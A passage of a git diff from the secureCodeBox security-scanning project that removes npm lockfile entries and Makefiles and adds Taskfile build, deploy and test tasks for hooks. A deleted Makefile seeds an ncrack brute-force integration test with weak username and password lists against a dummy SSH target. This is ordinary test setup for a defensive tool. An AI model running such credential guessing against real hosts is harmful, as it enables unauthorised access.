"version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - } - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - }, - "sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - } - } - }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" } } } diff --git a/hook-sdk/nodejs/package.json b/hook-sdk/nodejs/package.json index ae396e3653..c25304386e 100644 --- a/hook-sdk/nodejs/package.json +++ b/hook-sdk/nodejs/package.json @@ -1,16 +1,14 @@ { "name": "@securecodebox/hook-sdk-nodejs", "version": "1.0.0", + "type": "module", "description": "Handles external communication required for all secureCodeBox Hooks", "main": "hook-wrapper.js", - "scripts": { - "test": "jest" - }, + "scripts": {}, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", - "ws": "^8.13.0" + "@kubernetes/client-node": "^1.3.0" } -} +} \ No newline at end of file diff --git a/hooks/Makefile b/hooks/Makefile deleted file mode 100644 index 62c3669841..0000000000 --- a/hooks/Makefile +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include ../prerequisites.mk - -.PHONY: integration-tests -integration-tests: - for dir in $(wildcard */.); do \ - $(MAKE) integration-tests -C $$dir;\ - done - -.PHONY: unit-tests -unit-tests: - for dir in $(wildcard */.); do \ - $(MAKE) unit-tests -C $$dir;\ - done - -.PHONY: helm-unit-tests -helm-unit-tests: - set -e; \ - for directory in ./*; do \ - if [ -d "$$directory" ]; then \ - dir_name=$$(basename "$$directory"); \ - if [ "$$dir_name" != "coverage" ] && [ "$$dir_name" != "node_modules" ] && [ "$$dir_name" != "persistence-static-report" ]; then \ - helm unittest "$$directory"; \ - fi; \ - fi; \ - done diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml new file mode 100644 index 0000000000..b55830e652 --- /dev/null +++ b/hooks/Taskfile.yaml @@ -0,0 +1,146 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + demo-targets: + taskfile: ../demo-targets/Taskfile.yaml + internal: true + core: + taskfile: ../Taskfile.yaml + internal: true + +vars: + # addtional cli args to pass to the helm install command which installs the hook into the testing environment + additionalHelmInstallArgsForHook: '{{ .additionalHelmInstallArgsForHook | default "" }}' + hasIntegrationTests: + sh: 'if [ -d "{{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests" ]; then echo "true"; else echo "false"; fi' + hookUsesNpmDependencies: + sh: 'if [ -f "{{ .TASKFILE_DIR }}/{{ .hookName }}/hook/package.json" ]; then echo "true"; else echo "false"; fi' +env: + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' + +tasks: + build: + desc: Build the Docker image for the {{ .hookName }} hook + status: + - docker images | grep -q "docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG}" || false + preconditions: + - msg: "Docker is not running, please start Docker first" + sh: "docker info >/dev/null 2>&1 || false" + deps: + - core:build-hook-sdk-image + cmds: + - | + echo "Building custom hook image for {{ .hookName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG} \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ + kind load docker-image --name testing-env docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG} + predeploy: + desc: Can be overwritten by the hook to perform any pre-deployment steps + cmds: [] + silent: true + deploy: + desc: Deploy the {{ .hookName }} hook to the testing environment + status: + - helm ls {{ .hookName }} -n integration-tests | grep -q '{{ .hookName }}' || false + cmds: + - task: core:prepare-testing-env + - task: build + - 'echo "Deploying {{ .hookName }} to the testing environment"' + - task: predeploy + - | + helm upgrade --install {{ .hookName }} {{ .TASKFILE_DIR }}/{{ .hookName }} --namespace integration-tests \ + --set="hook.image.tag=${IMG_TAG}" \ + --set="hook.image.pullPolicy=Never" \ + {{ if ne "" .additionalHelmInstallArgsForHook -}} + {{ .additionalHelmInstallArgsForHook -}} + {{ end -}} + --wait + + # test:setup tasks + test:setup:hook-sdk: + internal: true + status: + - "[ -d {{ .TASKFILE_DIR }}/../hook-sdk/nodejs/node_modules ] || false" + cmds: + - cd {{ .TASKFILE_DIR }}/../hook-sdk/nodejs/ && bun install + test:setup:test-helpers: + internal: true + status: + - "[ -d {{ .TASKFILE_DIR }}/../tests/integration/node_modules ] || false" + cmds: + - cd {{ .TASKFILE_DIR }}/../tests/integration && bun install + test:setup:hook-deps: + internal: true + status: + - "[ -d {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/node_modules ] || false" + cmds: + - | + {{ if eq "true" .hookUsesNpmDependencies }} + cd {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ && bun install + {{ else }} + echo "Hook has no custom dependencies. Skipping." + {{ end }} + test:setup: + cmds: + - task: test:setup:hook-sdk + - task: test:setup:test-helpers + - task: test:setup:hook-deps + + test:unit: + desc: Run unit tests for the {{ .hookName }} hook + deps: + - test:setup + cmds: + - | + echo "Running unit tests for {{ .hookName }}" + bun test {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ + test:integration: + desc: Run integration tests for the {{ .hookName }} hook + deps: + - test:setup + - deploy + preconditions: + - msg: "kind cluster is not running, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl config get-contexts | grep -q 'kind-testing-env' || false" + - msg: "secureCodeBox operator is not deployed, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" + - msg: "{{ .hookName }} hook is not deployed, run 'task build deploy' from hook dir first" + sh: "helm -n integration-tests ls | grep -q '{{ .hookName }}' || false" + cmds: + # Workaround for https://github.com/oven-sh/bun/issues/7332 + - 'echo "Forwarding the Kubernetes API to localhost"' + - kubectl proxy >/dev/null 2>&1 & + - sleep 1 # Wait a bit to ensure the proxy is up + + - defer: | + # kill pid with command "kubectl proxy" + echo "Killing kubectl proxy" + pkill -f "kubectl proxy" + + - echo "Running integration tests for {{ .hookName }}" + - |- + {{ if eq "true" .hasIntegrationTests -}} + bun test {{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests/ + {{ else -}} + echo "Hook has no integration-tests. Skipping." + {{ end -}} + + test:helm: + desc: Run helm tests for the {{ .hookName }} hook + preconditions: + - msg: "Helm unittest plugin is not installed, you need to install it first. See: https://github.com/helm-unittest/helm-unittest/" + sh: "helm plugin list | grep -q 'unittest' || false" + cmds: + - helm unittest {{ .TASKFILE_DIR }}/{{ .hookName }} + test: + desc: Run all tests for the {{ .hookName }} hook + cmds: + - task test:unit + - task test:helm + - task test:integration diff --git a/hooks/cascading-scans/.gitignore b/hooks/cascading-scans/.gitignore index 848754b329..2fd17837f0 100644 --- a/hooks/cascading-scans/.gitignore +++ b/hooks/cascading-scans/.gitignore @@ -7,3 +7,7 @@ node_modules **.js !**.test.js *.tar + +# files generated by the test suite +passwords.txt +users.txt \ No newline at end of file diff --git a/hooks/cascading-scans/Makefile b/hooks/cascading-scans/Makefile deleted file mode 100644 index 1b417f33df..0000000000 --- a/hooks/cascading-scans/Makefile +++ /dev/null @@ -1,74 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = cascading-scans - -test_files = [hook.test.js, kube.test.js] - -include ../../hooks.mk - -# Deploys dependencies for both the nmap-ncrack test and the nmap-sslyze test -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-deps-1 deploy-test-deps-2 - -.PHONY: test-2 -test-2: | clean-integration-tests unit-tests docker-build docker-export kind-import deploy deploy-test-deps-2 integration-tests-2 - -.PHONY: deploy-test-dep-nmap -deploy-test-dep-nmap: - cd $(SCANNERS_DIR)/nmap/ && $(MAKE) -s docker-build docker-export kind-import && \ - helm -n integration-tests upgrade --install nmap . \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-nmap" \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-nmap" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="cascadingRules.enabled=true" - -.PHONY: deploy-test-dep-ncrack -deploy-test-dep-ncrack: - printf "root\nadmin\n" > users.txt - printf "THEPASSWORDYOUCREATED\n123456\npassword\n" > passwords.txt - kubectl create secret generic --from-file users.txt --from-file passwords.txt ncrack-lists -n integration-tests --dry-run=client -o yaml | kubectl apply -f - - cd $(SCANNERS_DIR)/ncrack/ && $(MAKE) -s docker-build docker-export kind-import && \ - helm -n integration-tests upgrade --install ncrack . \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-ncrack" \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-ncrack" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="scanner.extraVolumes[0].name=ncrack-lists" \ - --set="scanner.extraVolumes[0].secret.secretName=ncrack-lists" \ - --set="scanner.extraVolumeMounts[0].name=ncrack-lists" \ - --set="scanner.extraVolumeMounts[0].mountPath=/ncrack/" \ - --set="cascadingRules.enabled=true" - -.PHONY: deploy-test-dep-sslyze -deploy-test-dep-sslyze: - cd $(SCANNERS_DIR)/sslyze/ && $(MAKE) -s docker-build docker-export kind-import && \ - helm -n integration-tests upgrade --install sslyze . --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-sslyze" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="cascadingRules.enabled=true" - -.PHONY: deploy-test-deps-1 # Deploys dependencies for the nmap-ncrack test -deploy-test-deps: deploy-test-dep-dummy-ssh deploy-test-dep-nmap deploy-test-dep-ncrack - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'cascading-scans'." - helm -n integration-tests upgrade --install dssh . --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" - -.PHONY: deploy-test-deps-2 # Deploys dependencies for the nmap-sslyze test -deploy-test-deps-2: deploy-test-dep-unsafe-https deploy-test-dep-nmap deploy-test-dep-sslyze \ No newline at end of file diff --git a/hooks/cascading-scans/Taskfile.yaml b/hooks/cascading-scans/Taskfile.yaml new file mode 100644 index 0000000000..c1307fd720 --- /dev/null +++ b/hooks/cascading-scans/Taskfile.yaml @@ -0,0 +1,36 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + hookName: cascading-scans + 